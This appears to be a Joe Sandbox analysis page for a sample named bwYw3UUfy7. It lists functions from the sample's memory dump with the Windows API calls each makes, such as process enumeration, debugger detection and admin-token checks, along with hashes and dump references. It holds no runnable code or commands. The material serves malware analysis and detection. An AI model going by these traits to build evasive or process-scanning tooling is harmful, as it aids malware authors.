Opcode ID: f1f649e0517c9dd84b30a98cea483752510a1b990a81d4114d34091cb816cf2e
Instruction ID: 1a929c0afc069786e26bf930260915da4827dfa85cdca16ed1cb3bcaa10c69ac
Opcode Fuzzy Hash: f1f649e0517c9dd84b30a98cea483752510a1b990a81d4114d34091cb816cf2e
Instruction Fuzzy Hash: 5441513190851AFBDF19AF64C848BEEB775FF45320F208219E529A72D0D738AD50CB51

Function 0075E1E0 Relevance: 6.1, APIs: 2, Strings: 1, Instructions: 848COMMON

Download Yara Rule

Strings

pow, xrefs: 0075E2E5, 0075E302

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID:
String ID: pow
API String ID: 0-2276729525
Opcode ID: 573fe8b345a6fa279ae02e03ffde33db7b51b02f634ee0f36fa8f63fbc0931e4
Instruction ID: 8ae667bb9dd0a7e4e76095007eeb63f4481fbe546c68916beb3b429c628f9057
Opcode Fuzzy Hash: 573fe8b345a6fa279ae02e03ffde33db7b51b02f634ee0f36fa8f63fbc0931e4
Instruction Fuzzy Hash: 0E523721D29F414DD72B9634CC263356799AFB23C5F24C727EC17B5AAAEB2DC8838105

Function 0079D4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0079D501
Process32FirstW.KERNEL32(00000000,?), ref: 0079D50F
Process32NextW.KERNEL32(00000000,?), ref: 0079D52F
CloseHandle.KERNEL32(00000000), ref: 0079D5DC

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: df0d2397543031599bceaefd7692bd07e711c0b39d68193a739059f6a8ba1578
Instruction ID: d94e763f0e3194d50d4ec6c0238c9fdeab661a35a65a081b8baa96768e378eca
Opcode Fuzzy Hash: df0d2397543031599bceaefd7692bd07e711c0b39d68193a739059f6a8ba1578
Instruction Fuzzy Hash: 2031B171108300DFD311EF64D885AAFBBE8EF99354F14092DF685861A2EB759944CBA2

Function 007C8FC9 Relevance: 6.1, APIs: 4, Instructions: 78nativewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00749BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00749BB2

GetCursorPos.USER32(?), ref: 007C9001
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00787711,?,?,?,?,?), ref: 007C9016
GetCursorPos.USER32(?), ref: 007C905E
NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,00787711,?,?,?), ref: 007C9094

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
String ID:
API String ID: 1423138444-0
Opcode ID: b2358db8c26dffd52fb310e14746320354e0ebf5f941407b27338e3af2557193
Instruction ID: 91f9e74029496df424cc64af806fd81a6543213dcab46b4acf06c6a6de034c87
Opcode Fuzzy Hash: b2358db8c26dffd52fb310e14746320354e0ebf5f941407b27338e3af2557193
Instruction Fuzzy Hash: 58219F35600018EFCB668F94DC5CFEABBB9FB89360F14406DFA0587261C3399990DB60

Function 007C9EF3 Relevance: 6.1, APIs: 4, Instructions: 55nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00749BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00749BB2

GetClientRect.USER32(?,?), ref: 007C9F31
GetCursorPos.USER32(?), ref: 007C9F3B
ScreenToClient.USER32(?,?), ref: 007C9F46
NtdllDialogWndProc_W.NTDLL(?,00000020,?,00000000,?,?,?), ref: 007C9F7A

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: Client$CursorDialogLongNtdllProc_RectScreenWindow
String ID:
API String ID: 1010295502-0
Opcode ID: bb1e1674af74eece0ce687b3b689d76d3b08f9776bc5c8a7451d7986ac8a6e0b
Instruction ID: 92403d4205dcbed43849599b5134914322a82d243167cee6393dc3bb8cba85a3
Opcode Fuzzy Hash: bb1e1674af74eece0ce687b3b689d76d3b08f9776bc5c8a7451d7986ac8a6e0b
Instruction Fuzzy Hash: A611453290011AEBDB41DFA8D889EEEB7B8FB05311F10445DFA01E3140D738BA91CBA5

Function 00762622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0076271A
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00762724
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00762731

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 0750c865bab3333981ba52cc3db343881f00f11b34534b90c2b6b61be40bd91d
Instruction ID: f65ade927fd7557331f97171c4e9179a74ede0e4b6390a011bc7bedae1c85b72
Opcode Fuzzy Hash: 0750c865bab3333981ba52cc3db343881f00f11b34534b90c2b6b61be40bd91d
Instruction Fuzzy Hash: BA31D57490121C9BCB21DF64DC88BDCBBB8AF08310F5081EAE80CA7261E7749F858F85

Function 00791663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0079168C
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 007916A1
FreeSid.ADVAPI32(?), ref: 007916B1

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: f7b96848838aed2bbefa93f06ac6530720ab4fcce828c331589b91f2abbe7bf2
Instruction ID: 340a06a36e0993314124204a179f15b56c1d53561ea045f34205559060ab621f
Opcode Fuzzy Hash: f7b96848838aed2bbefa93f06ac6530720ab4fcce828c331589b91f2abbe7bf2
Instruction Fuzzy Hash: 48F0F471950309FBDF00DFE49C89EAEBBBCFB08604F508565EA01E2181E778AA448A58

Function 00754CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,00754CBE,?,007F88B8,0000000C,00754E63,?,00000000,00000000,?,0075056E,?,00000007,007F86C8,00000014), ref: 00754D09
TerminateProcess.KERNEL32(00000000,?,00754CBE,?,007F88B8,0000000C,00754E63,?,00000000,00000000,?,0075056E,?,00000007,007F86C8,00000014), ref: 00754D10
ExitProcess.KERNEL32 ref: 00754D22

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 416c404954c9c4d53ebc3128a348f331044b962df33f4375ee907049418ed790
Instruction ID: 4814eb57daf2cb3b6c35f277881e886d96ff90c2b5d6587dabf9b84fa1cba6e5
Opcode Fuzzy Hash: 416c404954c9c4d53ebc3128a348f331044b962df33f4375ee907049418ed790
Instruction Fuzzy Hash: A1E0BF71500648ABCF126F64DD0DE983B79FB41746B148018FD098B122CB7DDD86CA94

Function 007497C0 Relevance: 3.1, APIs: 2, Instructions: 80nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00749BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00749BB2

Part of subcall function 00749944: GetWindowLongW.USER32(?,000000EB), ref: 00749952

GetParent.USER32(?), ref: 007873A3
NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?), ref: 0078742D

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: LongWindow$DialogNtdllParentProc_
String ID:
API String ID: 314495775-0
Opcode ID: 16263521fa2e7149c25dd6ce94c14e06d7b4a1ad6bf99e035b8c2a13f0afb5c7
Instruction ID: 385325587cc216e9e85e1e4f9421ea2150f847906bf4382282c409cd3061ccba
Opcode Fuzzy Hash: 16263521fa2e7149c25dd6ce94c14e06d7b4a1ad6bf99e035b8c2a13f0afb5c7
Instruction Fuzzy Hash: 2321B130644144AFCF29AF2CCC49DEA3B95EF46370F244255FA265B2A1C3399D51E741

Function 007C90A1 Relevance: 3.0, APIs: 2, Instructions: 44nativewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00749BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00749BB2

NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,0078769C,?,?,?), ref: 007C9111

Part of subcall function 00749944: GetWindowLongW.USER32(?,000000EB), ref: 00749952

SendMessageW.USER32(?,00000401,00000000,00000000), ref: 007C90F7

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: LongWindow$DialogMessageNtdllProc_Send
String ID:
API String ID: 1273190321-0
Opcode ID: 3c77dc207e36a02e8445dd365d425cabc45575cff7eafb8bd434e68cc0e11cf3
Instruction ID: 0e673f12fcb576b660ace5235783772b55a21e6e194c71a5738437a35174958f
Opcode Fuzzy Hash: 3c77dc207e36a02e8445dd365d425cabc45575cff7eafb8bd434e68cc0e11cf3
Instruction Fuzzy Hash: F801BC30200208EBDB619F14DC8EFA67BA6FB85765F14406CFA551A2E1CB36A851CB50

Function 007A37B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,007B4891,?,?,?), ref: 007A37E4
FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,007B4891,?,?,?), ref: 007A37F4

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 91b14e464ea3efe87d9bc94891e46e7039d8b521a162ef8d1ed4725833fef071
Instruction ID: 97682608d453ada24177fec0be3aa6a01f06418daecd79a15e13b07628d9989d
Opcode Fuzzy Hash: 91b14e464ea3efe87d9bc94891e46e7039d8b521a162ef8d1ed4725833fef071
Instruction Fuzzy Hash: FFF0E5B1705328AAEB2057769C8DFEB3BAEEFC5761F004265F509D2281D9B49904C7B0

Function 007C9400 Relevance: 3.0, APIs: 2, Instructions: 32nativeCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 007C9423
NtdllDialogWndProc_W.NTDLL(?,00000200,?,00000000,?,?,00000000,00000000,?,0078776C,?,?,?,?,?), ref: 007C944C

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: ClientDialogNtdllProc_Screen
String ID:
API String ID: 3420055661-0
Opcode ID: da31c6ec04ef86ae782d0fb07a3816d82de0cfbb0904f4f31e3d6084b9630db6
Instruction ID: 681cc24336959cfc0e18053391a40e5ab8b98c3e1c1d3b2f9580cac0d258ff31
Opcode Fuzzy Hash: da31c6ec04ef86ae782d0fb07a3816d82de0cfbb0904f4f31e3d6084b9630db6
Instruction Fuzzy Hash: 11F03A72400218FFEF058F51DC09EAE7FB8FB44361F10405AF905A2160D379AA61DB64

Function 007C953A Relevance: 3.0, APIs: 2, Instructions: 21nativeCOMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 007C9542
NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,007876FB,?,?,?,?), ref: 007C956C

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: DialogLongNtdllProc_Window
String ID:
API String ID: 2065330234-0
Opcode ID: 6a57682752add2522831ad5d34f1814f6c09e423bbd3124b00575865f67bc1c2
Instruction ID: c822e2da47422638cb8545e8b84bca21a3514b5c9d0ddddabff50ad09d894b6b
Opcode Fuzzy Hash: 6a57682752add2522831ad5d34f1814f6c09e423bbd3124b00575865f67bc1c2
Instruction Fuzzy Hash: 84E08630104214B7FB160F19EC0AFB93B24E700B91F10811DFA57980E1D7B596E0E364

Function 0073CAF0 Relevance: 1.9, Strings: 1, Instructions: 659COMMON

Download Yara Rule

Strings

Variable is not of type 'Object'., xrefs: 00780C40

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID:
String ID: Variable is not of type 'Object'.
API String ID: 0-1840281001
Opcode ID: 4af57d497205c4c552c90487d5800a794271234851dfd3e8dbe1869f2d12eea6
Instruction ID: 51958b63891c436f3b41ee65014b276f7e06febf9442eda9ba5469db6eb02ebc
Opcode Fuzzy Hash: 4af57d497205c4c552c90487d5800a794271234851dfd3e8dbe1869f2d12eea6
Instruction Fuzzy Hash: DF32AF75A00218DFEF15EF94C889BEDB7B5BF05304F148059E806BB292D779AD49CBA0

Function 007CA2D7 Relevance: 1.6, APIs: 1, Instructions: 68nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00749BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00749BB2

NtdllDialogWndProc_W.NTDLL(?,00000112,?,?), ref: 007CA38F

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: DialogLongNtdllProc_Window
String ID:
API String ID: 2065330234-0
Opcode ID: b3219690b25db3580073f1fdac0980990838d5b46c3f378a4cc4a4494ee94dff
Instruction ID: 3e747d692b8280a1483558ad996e37150c53a6793ddddc5a27fff11fdd0f0518
Opcode Fuzzy Hash: b3219690b25db3580073f1fdac0980990838d5b46c3f378a4cc4a4494ee94dff
Instruction Fuzzy Hash: BD113B30200298BAFB251B2CCD2DFBD3B54E741765F24832CF9214A1D2C76C4D41D266

Function 007C9E74 Relevance: 1.5, APIs: 1, Instructions: 45nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00749944: GetWindowLongW.USER32(?,000000EB), ref: 00749952

NtdllDialogWndProc_W.NTDLL(?,00000115,?,?,?,?,?,?,007876B8,?,?,?,?,00000000,?), ref: 007C9EE7

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
